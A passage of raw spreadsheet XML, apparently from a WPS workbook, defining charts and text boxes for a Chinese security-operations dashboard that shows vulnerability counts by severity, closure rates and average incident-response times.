                </c:pt>
                <c:pt idx="1">
                  <c:v>中危漏洞</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>低危漏洞</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>数据统计!$D$80:$D$82</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>2582</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>3678</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>3194</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="1"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
          <c:showLeaderLines val="1"/>
        </c:dLbls>
        <c:firstSliceAng val="0"/>
        <c:holeSize val="50"/>
        <c:extLst>
          <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
            <c15:filteredPieSeries>
              <c15:ser>
                <c:idx val="0"/>
                <c:order val="1"/>
                <c:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>数据统计!$E$79</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>已闭环数</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数据统计!$C$80:$C$82</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="3"/>
                      <c:pt idx="0">
                        <c:v>高危漏洞</c:v>
                      </c:pt>
                      <c:pt idx="1">
                        <c:v>中危漏洞</c:v>
                      </c:pt>
                      <c:pt idx="2">
                        <c:v>低危漏洞</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c:cat>
                <c:val>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>数据统计!$E$80:$E$82</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:numCache>
                      <c:formatCode>General</c:formatCode>
                      <c:ptCount val="3"/>
                      <c:pt idx="0">
                        <c:v>220</c:v>
                      </c:pt>
                      <c:pt idx="1">
                        <c:v>220</c:v>
                      </c:pt>
                      <c:pt idx="2">
                        <c:v>325</c:v>
                      </c:pt>
                    </c:numCache>
                  </c:numRef>
                </c:val>
              </c15:ser>
            </c15:filteredPieSeries>
            <c15:filteredPieSeries>
              <c15:ser>
                <c:idx val="2"/>
                <c:order val="2"/>
                <c:tx>
                  <c:strRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>数据统计!$F$79</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="1"/>
                      <c:pt idx="0">
                        <c:v>闭环率</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数据统计!$C$80:$C$82</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:strCache>
                      <c:ptCount val="3"/>
                      <c:pt idx="0">
                        <c:v>高危漏洞</c:v>
                      </c:pt>
                      <c:pt idx="1">
                        <c:v>中危漏洞</c:v>
                      </c:pt>
                      <c:pt idx="2">
                        <c:v>低危漏洞</c:v>
                      </c:pt>
                    </c:strCache>
                  </c:strRef>
                </c:cat>
                <c:val>
                  <c:numRef>
                    <c:extLst>
                      <c:ext uri="{02D57815-91ED-43cb-92C2-25804820EDAC}">
                        <c15:formulaRef>
                          <c15:sqref>数据统计!$F$80:$F$82</c15:sqref>
                        </c15:formulaRef>
                      </c:ext>
                    </c:extLst>
                    <c:numCache>
                      <c:formatCode>0.00%</c:formatCode>
                      <c:ptCount val="3"/>
                      <c:pt idx="0">
                        <c:v>0.0852052672347018</c:v>
                      </c:pt>
                      <c:pt idx="1">
                        <c:v>0.0598151169113649</c:v>
                      </c:pt>
                      <c:pt idx="2">
                        <c:v>0.101753287413901</c:v>
                      </c:pt>
                    </c:numCache>
                  </c:numRef>
                </c:val>
              </c15:ser>
            </c15:filteredPieSeries>
          </c:ext>
        </c:extLst>
      </c:doughnutChart>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
    <c:extLst>
      <c:ext uri="{0b15fc19-7d7d-44ad-8c2d-2c3a37ce22c3}">
        <chartProps xmlns="https://web.wps.cn/et/2018/main" chartId="{2ffc66e2-eb75-4b24-b6fd-9b8f3065f1e1}"/>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数据统计!$B$61</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>平均响应时长</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数据统计!$C$60:$K$60</c:f>
              <c:strCache>
                <c:ptCount val="9"/>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strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>数据统计!$C$61:$K$61</c:f>
              <c:numCache>
                <c:formatCode>0.00_ </c:formatCode>
                <c:ptCount val="9"/>
                <c:pt idx="0">
                  <c:v>1.48866666666667</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>5.33</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>20.4566666666667</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>3.66363636363636</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>7.932</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>7.746</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>5.53</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>0</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:marker val="0"/>
        <c:smooth val="0"/>
        <c:axId val="926048702"/>
        <c:axId val="51301949"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="92604870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1301949"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="51301949"/>
        <c:scaling>
          <c:orientation val="minMax"/>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926048702"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
      <c:spPr>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst/>
      </c:spPr>
    </c:plotArea>
    <c:plotVisOnly val="1"/>
    <c:dispBlanksAs val="gap"/>
    <c:showDLblsOverMax val="0"/>
    <c:extLst>
      <c:ext uri="{0b15fc19-7d7d-44ad-8c2d-2c3a37ce22c3}">
        <chartProps xmlns="https://web.wps.cn/et/2018/main" chartId="{63e17aa2-fc5a-4ac4-9ace-d071ff5c9311}"/>
      </c:ext>
    </c:extLst>
  </c:chart>
  <c:spPr>
    <a:noFill/>
    <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
      <a:noFill/>
      <a:prstDash val="solid"/>
      <a:round/>
    </a:ln>
    <a:effectLst/>
  </c:spPr>
  <c:txPr>
    <a:bodyPr/>
    <a:lstStyle/>
    <a:p>
      <a:pPr>
        <a:defRPr lang="zh-CN" b="0">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0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1">
      <cs:styleClr val="auto"/>
    </cs:fillRef>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor">
      <a:schemeClr val="tx1"/>
    </cs:fontRef>
    <cs:spPr>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291465</xdr:colOff>
      <xdr:row>15</xdr:row>
      <xdr:rowOff>36195</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>337185</xdr:colOff>
      <xdr:row>16</xdr:row>
      <xdr:rowOff>108585</xdr:rowOff>
    </xdr:to>
    <xdr:sp>
      <xdr:nvSpPr>
        <xdr:cNvPr id="50" name="文本框 49" descr="7b0a20202020227461726765744d6f64756c65223a202270726f636573734f6e6c696e65466f6e7473220a7d0a"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="291465" y="2832735"/>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资产分布</a:t>
          </a:r>
          <a:endPar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0</xdr:col>
      <xdr:colOff>153035</xdr:colOff>
      <xdr:row>28</xdr:row>
      <xdr:rowOff>52070</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>202565</xdr:colOff>
      <xdr:row>29</xdr:row>
      <xdr:rowOff>127000</xdr:rowOff>
    </xdr:to>
    <xdr:sp>
      <xdr:nvSpPr>
        <xdr:cNvPr id="62" name="文本框 61" descr="7b0a20202020227461726765744d6f64756c65223a202270726f636573734f6e6c696e65466f6e7473220a7d0a"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="153035" y="5226050"/>
          <a:ext cx="2518410" cy="25781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漏洞分布</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196850</xdr:colOff>
      <xdr:row>28</xdr:row>
      <xdr:rowOff>57150</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>242570</xdr:colOff>
      <xdr:row>29</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:sp>
      <xdr:nvSpPr>
        <xdr:cNvPr id="66" name="文本框 65" descr="7b0a20202020227461726765744d6f64756c65223a202270726f636573734f6e6c696e65466f6e7473220a7d0a"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3900170" y="5231130"/>
          <a:ext cx="2514600" cy="25527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重要时期安全态势分析</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0</xdr:col>
      <xdr:colOff>300355</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>109855</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>346096</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>182561</xdr:rowOff>
    </xdr:to>
    <xdr:sp>
      <xdr:nvSpPr>
        <xdr:cNvPr id="70" name="文本框 69" descr="7b0a20202020227461726765744d6f64756c65223a202270726f636573734f6e6c696e65466f6e7473220a7d0a"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="300355" y="475615"/>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defRPr/>
          </a:pPr>
          <a:r>
            <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事件</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"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类型分布</a:t>
          </a:r>
          <a:endPar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177800</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>205740</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>223541</xdr:colOff>
      <xdr:row>16</xdr:row>
      <xdr:rowOff>65086</xdr:rowOff>
    </xdr:to>
    <xdr:sp>
      <xdr:nvSpPr>
        <xdr:cNvPr id="42" name="文本框 41" descr="7b0a20202020227461726765744d6f64756c65223a202270726f636573734f6e6c696e65466f6e7473220a7d0a"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3881120" y="2796540"/>
          <a:ext cx="2514600" cy="24765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defRPr/>
          </a:pPr>
          <a:r>
            <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年度安全</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"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威胁趋势</a:t>
          </a:r>
          <a:endPar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7</xdr:col>
      <xdr:colOff>359571</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>3810</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>14</xdr:col>
      <xdr:colOff>349618</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>5222</xdr:rowOff>
    </xdr:to>
    <xdr:sp textlink="数据统计!D1">
      <xdr:nvSpPr>
        <xdr:cNvPr id="12" name="文本框 11" descr="7b0a20202020227461726765744d6f64756c65223a202270726f636573734f6e6c696e65466f6e7473220a7d0a"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4679950" y="3810"/>
          <a:ext cx="4310380" cy="367030"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
      <xdr:txBody>
        <a:bodyPr wrap="square" rtlCol="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674E439-7D18-4D51-9B10-964C6DD3E554}" type="TxLink">
            <a:rPr lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">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rPr>
            <a:t> </a:t>
          </a:fld>
          <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">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9</xdr:col>
      <xdr:colOff>532402</xdr:colOff>
      <xdr:row>15</xdr:row>
      <xdr:rowOff>147230</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>12</xdr:col>
      <xdr:colOff>163285</xdr:colOff>
      <xdr:row>19</xdr:row>
      <xdr:rowOff>32658</xdr:rowOff>
    </xdr:to>
    <xdr:sp>
      <xdr:nvSpPr>
        <xdr:cNvPr id="80" name="矩形 79"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6087110" y="2943225"/>
          <a:ext cx="1482725" cy="617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906915EF-5DA3-4E2E-9C98-07636E85A2E3}" type="TxLink">
            <a:rPr lang="en-US" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="7" charset="0"/>
            </a:rPr>
            <a:t> </a:t>
          </a:fld>
          <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>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6</xdr:col>
      <xdr:colOff>443865</xdr:colOff>
      <xdr:row>21</xdr:row>
      <xdr:rowOff>35560</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>9</xdr:col>
      <xdr:colOff>28171</xdr:colOff>
      <xdr:row>24</xdr:row>
      <xdr:rowOff>98649</xdr:rowOff>
    </xdr:to>
    <xdr:sp>
      <xdr:nvSpPr>
        <xdr:cNvPr id="91" name="矩形 90"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4147185" y="3929380"/>
          <a:ext cx="1435735" cy="611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CECF2E03-692F-4B84-88BE-C42F1607F1A5}" type="TxLink">
            <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rPr>
            <a:t> </a:t>
          </a:fld>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12</xdr:col>
      <xdr:colOff>526415</xdr:colOff>
      <xdr:row>21</xdr:row>
      <xdr:rowOff>47625</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>15</xdr:col>
      <xdr:colOff>110490</xdr:colOff>
      <xdr:row>24</xdr:row>
      <xdr:rowOff>110490</xdr:rowOff>
    </xdr:to>
    <xdr:sp>
      <xdr:nvSpPr>
        <xdr:cNvPr id="99" name="矩形 98"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7933055" y="3941445"/>
          <a:ext cx="1435735" cy="611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fld id="{A87949AA-659B-420A-A559-984BC2AEE136}" type="TxLink">
            <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rPr>
            <a:t> </a:t>
          </a:fld>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10</xdr:col>
      <xdr:colOff>89804</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>43180</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>11</xdr:col>
      <xdr:colOff>549318</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>109855</xdr:rowOff>
    </xdr:to>
    <xdr:sp>
      <xdr:nvSpPr>
        <xdr:cNvPr id="109" name="矩形 108"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6261735" y="1193800"/>
          <a:ext cx="1076960" cy="6153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fld id="{D1CA1E61-AD71-4FAD-B6B4-A1B780935973}" type="TxLink">
            <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rPr>
            <a:t> </a:t>
          </a:fld>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10</xdr:col>
      <xdr:colOff>213877</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>112078</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>11</xdr:col>
      <xdr:colOff>495312</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>5490</xdr:rowOff>
    </xdr:to>
    <xdr:sp>
      <xdr:nvSpPr>
        <xdr:cNvPr id="4" name="矩形 3"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6385560" y="294640"/>
          <a:ext cx="899160" cy="2590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fld id="{003F050C-C2A7-4F21-8F6D-1625ADBE451E}" type="TxLink">
            <a:rPr lang="en-US" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>2025/8/1</a:t>
          </a:fld>
          <a:endParaRPr lang="en-US" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike">
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="7" charset="-122"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>6</xdr:col>
      <xdr:colOff>349250</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>211455</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>11</xdr:col>
      <xdr:colOff>388620</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>162560</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="10" name="图表 9"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="4052570" y="967740"/>
        <a:ext cx="3125470" cy="162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338455</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>233045</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>394970</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>69215</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="25" name="图表 24" descr="7b0a202020202263686172745265734964223a20223230343736383734220a7d0a"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="338455" y="781685"/>
        <a:ext cx="3142615" cy="17183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309880</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>31115</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>408940</xdr:colOff>
      <xdr:row>26</xdr:row>
      <xdr:rowOff>69215</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="27" name="图表 26" descr="7b0a202020202263686172745265734964223a20223230323931393734220a7d0a"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="309880" y="3193415"/>
        <a:ext cx="3185160" cy="16840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206375</xdr:colOff>
      <xdr:row>17</xdr:row>
      <xdr:rowOff>29845</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>16</xdr:col>
      <xdr:colOff>106045</xdr:colOff>
      <xdr:row>26</xdr:row>
      <xdr:rowOff>140970</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="29" name="图表 28"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="3909695" y="3192145"/>
        <a:ext cx="6071870" cy="17570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523240</xdr:colOff>
      <xdr:row>54</xdr:row>
      <xdr:rowOff>99695</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>31</xdr:col>
      <xdr:colOff>274320</xdr:colOff>
      <xdr:row>67</xdr:row>
      <xdr:rowOff>211455</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="32" name="图表 31"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="14719300" y="10028555"/>
        <a:ext cx="5016500" cy="246062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351155</xdr:colOff>
      <xdr:row>54</xdr:row>
      <xdr:rowOff>65405</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>40</xdr:col>
      <xdr:colOff>417830</xdr:colOff>
      <xdr:row>67</xdr:row>
      <xdr:rowOff>34925</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="35" name="图表 34"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="20429855" y="9994265"/>
        <a:ext cx="5004435" cy="23469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310515</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>358775</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>40005</xdr:rowOff>
    </xdr:to>
    <xdr:sp>
      <xdr:nvSpPr>
        <xdr:cNvPr id="2" name="文本框 1" descr="7b0a20202020227461726765744d6f64756c65223a202270726f636573734f6e6c696e65466f6e7473220a7d0a"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="4013835" y="579120"/>
          <a:ext cx="2517140" cy="245745"/>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安全事件处置成效（分钟）</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241935</xdr:colOff>
      <xdr:row>30</xdr:row>
      <xdr:rowOff>61595</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>11</xdr:col>
      <xdr:colOff>330835</xdr:colOff>
      <xdr:row>39</xdr:row>
      <xdr:rowOff>163195</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="9" name="图表 8"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="3945255" y="5601335"/>
        <a:ext cx="3175000" cy="1747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188595</xdr:colOff>
      <xdr:row>30</xdr:row>
      <xdr:rowOff>41275</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>273685</xdr:colOff>
      <xdr:row>39</xdr:row>
      <xdr:rowOff>142875</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="11" name="图表 10" descr="7b0a202020202263686172745265734964223a20223230343736353035220a7d0a"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="188595" y="5581015"/>
        <a:ext cx="3171190" cy="1747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330200</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>32385</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>22</xdr:col>
      <xdr:colOff>281305</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>41275</xdr:rowOff>
    </xdr:to>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="6" name="图表 5" descr="7b0a202020202263686172745265734964223a20223230343731343133220a7d0a"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="7736840" y="817245"/>
        <a:ext cx="6123305" cy="183769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461010</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>162560</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>16</xdr:col>
      <xdr:colOff>506730</xdr:colOff>
      <xdr:row>3</xdr:row>
      <xdr:rowOff>234950</xdr:rowOff>
    </xdr:to>
    <xdr:sp>
      <xdr:nvSpPr>
        <xdr:cNvPr id="7" name="文本框 6" descr="7b0a20202020227461726765744d6f64756c65223a202270726f636573734f6e6c696e65466f6e7473220a7d0a"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7867650" y="528320"/>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平均响应趋势（分钟）</a:t>
          </a:r>
          <a:endPar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7</xdr:col>
      <xdr:colOff>167640</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>66675</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>2428240</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>55245</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="2" name="ECB019B1-382A-4266-B25C-5B523AA43C14-1" descr="/Users/sangfor/Downloads/外部交付物/漏洞管理工作流程图.png漏洞管理工作流程图"/>
        <xdr:cNvPicPr/>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId1"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="10047605" y="66675"/>
          <a:ext cx="7412355" cy="4404360"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>7</xdr:col>
      <xdr:colOff>167640</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>92710</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>2442210</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>281305</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="4" name="图片 3"/>
        <xdr:cNvPicPr/>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip r:embed="rId2"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="10047605" y="4508500"/>
          <a:ext cx="7426325" cy="39738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D43"/>
  <sheetViews>
    <sheetView showGridLines="0" workbookViewId="0">
      <selection activeCell="P29" sqref="P29"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.4"/>
  <cols>
    <col min="1" max="24" width="9" style="197"/>
    <col min="25" max="25" width="13.7777777777778" style="197" customWidth="1"/>
    <col min="26" max="16384" width="9" style="197"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:30">
      <c r="A1" s="130"/>
      <c r="B1" s="130"/>
      <c r="C1" s="130"/>
      <c r="D1" s="130"/>
      <c r="E1" s="130"/>
      <c r="F1" s="130"/>
      <c r="G1" s="130"/>
      <c r="H1" s="130"/>
      <c r="I1" s="130"/>
      <c r="J1" s="130"/>
      <c r="K1" s="130"/>
      <c r="L1" s="130"/>
      <c r="M1" s="130"/>
      <c r="N1" s="130"/>
      <c r="O1" s="130"/>
      <c r="P1" s="130"/>
      <c r="Q1" s="130"/>
      <c r="R1" s="130"/>
      <c r="S1" s="130"/>
      <c r="T1" s="130"/>
      <c r="U1" s="130"/>
      <c r="V1" s="130"/>
      <c r="W1" s="130"/>
      <c r="X1" s="130"/>
    </row>
    <row r="2" spans="1:30">
      <c r="A2" s="130"/>
      <c r="B2" s="130"/>
      <c r="C2" s="130"/>
      <c r="D2" s="130"/>
      <c r="E2" s="130"/>
      <c r="F2" s="130"/>
      <c r="G2" s="130"/>
      <c r="H2" s="130"/>
      <c r="I2" s="130"/>
      <c r="J2" s="130"/>
      <c r="K2" s="130"/>
      <c r="L2" s="130"/>
      <c r="M2" s="130"/>
      <c r="N2" s="130"/>
